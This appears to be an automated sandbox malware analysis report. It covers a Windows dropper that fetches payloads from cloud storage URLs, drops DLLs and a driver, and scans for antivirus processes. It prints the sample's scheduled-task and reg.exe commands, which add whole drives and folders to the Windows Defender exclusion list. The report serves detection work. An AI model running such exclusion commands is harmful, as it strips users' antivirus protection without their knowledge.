Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBEFD40 cpuid 2_2_00007FFAADBEFD40
Source: C:\Users\user\Documents\ieiUC1.exeCode function: GetLocaleInfoA,2_2_000000014000F370
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: GetLocaleInfoA,38_2_000A6B1A
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCode function: GetLocaleInfoA,39_2_000F6B1A
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_000000014000A370
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_0000000140005A70
Source: C:\Users\user\Desktop\183643586-388657435.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: ieiUC1.exe, 00000002.00000002.36316546389.0000000002948000.00000002.00001000.00020000.00000000.sdmp, ieiUC1.exe, 00000003.00000002.36326151306.00000000029E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,2_2_00000001400042B0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,2_2_0000000140003F80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter		33
Windows Service		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory4
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts11
Scheduled Task/Job		11
Scheduled Task/Job		1
Access Token Manipulation		2
Obfuscated Files or Information		Security Account Manager124
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts12
Service Execution		1
Registry Run Keys / Startup Folder		33
Windows Service		1
DLL Side-Loading		NTDS231
Security Software Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
Process Injection		32
Masquerading		LSA Secrets1
Process Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
Scheduled Task/Job		1
Modify Registry		Cached Domain Credentials311
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		311
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590469 Sample: 183643586-388657435.07.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 77 vqxvll.net 2->77 79 vien3h.oss-cn-beijing.aliyuncs.com 2->79 81 8 other IPs or domains 2->81 91 Suricata IDS alerts for network traffic 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 Antivirus detection for dropped file 2->95 97 7 other signatures 2->97 9 ieiUC1.exe 29 2->9         started        14 183643586-388657435.07.exe 1 5 2->14         started        16 cmd.exe 1 2->16         started        18 20 other processes 2->18 signatures3 process4 dnsIp5 87 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49762, 49763 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->87 65 C:\Program Files (x86)\DXESuT\tbcore3U.dll, PE32 9->65 dropped 67 C:\Program Files (x86)\DXESuT\DXESuT.exe, PE32 9->67 dropped 69 C:\Users\Public\Music\destopbak.ini, MIPSEB 9->69 dropped 111 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->111 113 Found direct / indirect Syscall (likely to bypass EDR) 9->113 20 DXESuT.exe 9->20         started        25 cmd.exe 1 9->25         started        37 3 other processes 9->37 89 sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.17, 443, 49753, 49755 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->89 71 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->71 dropped 73 C:\Users\user\Documents\vselog.dll, PE32+ 14->73 dropped 75 C:\Users\user\Documents\ieiUC1.exe, PE32+ 14->75 dropped 115 Drops PE files to the document folder of the user 14->115 117 Sample is not signed and drops a device driver 14->117 119 Uses cmd line tools excessively to alter registry or file data 16->119 27 reg.exe 1 1 16->27         started        29 conhost.exe 16->29         started        121 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->121 123 Switches to a custom stack to bypass stack traces 18->123 31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        35 reg.exe 1 1 18->35         started        39 3 other processes 18->39 file6 signatures7 process8 dnsIp9 83 8.217.78.242, 49769, 8917 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->83 85 sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.103, 443, 49770, 49771 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 20->85 61 C:\Program Files (x86)\...\tbcore3U.dll, PE32 20->61 dropped 63 C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe, PE32 20->63 dropped 99 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->99 101 Creates an undocumented autostart registry key 20->101 103 Opens the same file many times (likely Sandbox evasion) 20->103 41 cmd.exe 20->41         started        105 Uses cmd line tools excessively to alter registry or file data 25->105 107 Uses schtasks.exe or at.exe to add and modify task schedules 25->107 43 conhost.exe 25->43         started        45 schtasks.exe 1 25->45         started        47 schtasks.exe 1 25->47         started        49 schtasks.exe 1 25->49         started        109 Adds extensions / path to Windows Defender exclusion list (Registry) 27->109 51 conhost.exe 37->51         started        53 conhost.exe 37->53         started        55 conhost.exe 37->55         started        57 9 other processes 37->57 file10 signatures11 process12 process13 59 conhost.exe 41->59         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
183643586-388657435.07.exe3%ReversingLabs
183643586-388657435.07.exe10%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\DXESuT\tbcore3U.dll100%AviraTR/Redcap.vdzex
C:\Program Files (x86)\6IAs1K1O\tbcore3U.dll100%AviraTR/Redcap.vdzex
C:\Program Files (x86)\DXESuT\tbcore3U.dll100%Joe Sandbox ML
C:\Program Files (x86)\6IAs1K1O\tbcore3U.dll100%Joe Sandbox ML
C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe0%ReversingLabs
C:\Program Files (x86)\DXESuT\DXESuT.exe0%ReversingLabs
C:\Users\user\Documents\ieiUC1.exe0%ReversingLabs
C:\Users\Public\Music\destopbak.ini0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://vien3h.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/a.gifhttps://vien3h.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/##vien3h.oss-cn-beijing.aliyuncs.com0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/a.gifU0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.png0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com:443/a.gifw00%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.png0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
118.178.60.9
truefalse
    		unknown
    sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
    		118.178.60.103
    		truefalse
      		high
      sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
      		39.103.20.17
      		truefalse
        		unknown
        vqxvll.net
        		unknown
        		unknownfalse
          		unknown
          upitem.oss-cn-hangzhou.aliyuncs.com
          		unknown
          		unknownfalse
            		unknown
            vien3h.oss-cn-beijing.aliyuncs.com
            		unknown
            		unknownfalse
              		unknown
              22mm.oss-cn-hangzhou.aliyuncs.com
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngfalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/a.giffalse
                • Avira URL Cloud: safe
                		unknown
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.pngfalse
                • Avira URL Cloud: safe
                		unknown
                https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngfalse
                • Avira URL Cloud: safe
                		unknown
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.pngfalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/b.giffalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/i.datfalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/s.datfalse
                • Avira URL Cloud: safe
                		unknown
                https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.pngfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/c.giffalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/d.giffalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://vien3h.oss-cn-beijing.aliyuncs.com/##vien3h.oss-cn-beijing.aliyuncs.com183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000106000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vien3h.oss-cn-beijing.aliyuncs.com/a.gifhttps://vien3h.oss-cn-beijing.aliyuncs.com/b.gifhttp183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.thawte.com0189atohci.sys.0.dr, ieiUC1.exe.0.drfalse
                  		high
                  https://vien3h.oss-cn-beijing.aliyuncs.com/183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vien3h.oss-cn-beijing.aliyuncs.com/a.gifU183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.symauth.com/cps0(ieiUC1.exe.0.drfalse
                    		high
                    http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, ieiUC1.exe.0.drfalse
                      		high
                      http://www.symauth.com/rpa00ieiUC1.exe.0.drfalse
                        		high
                        http://www.quovadis.bm0183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000135000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://ocsp.quovadisoffshore.com0183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000135000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://vien3h.oss-cn-beijing.aliyuncs.com:443/a.gifw0183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            39.103.20.17
                            		sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                            118.178.60.9
                            		sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                            8.217.78.242
                            		unknownSingapore
                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                            118.178.60.103
                            		sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

                            General Information

                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1590469
                            Start date and time:2025-01-14 05:08:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 18m 47s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
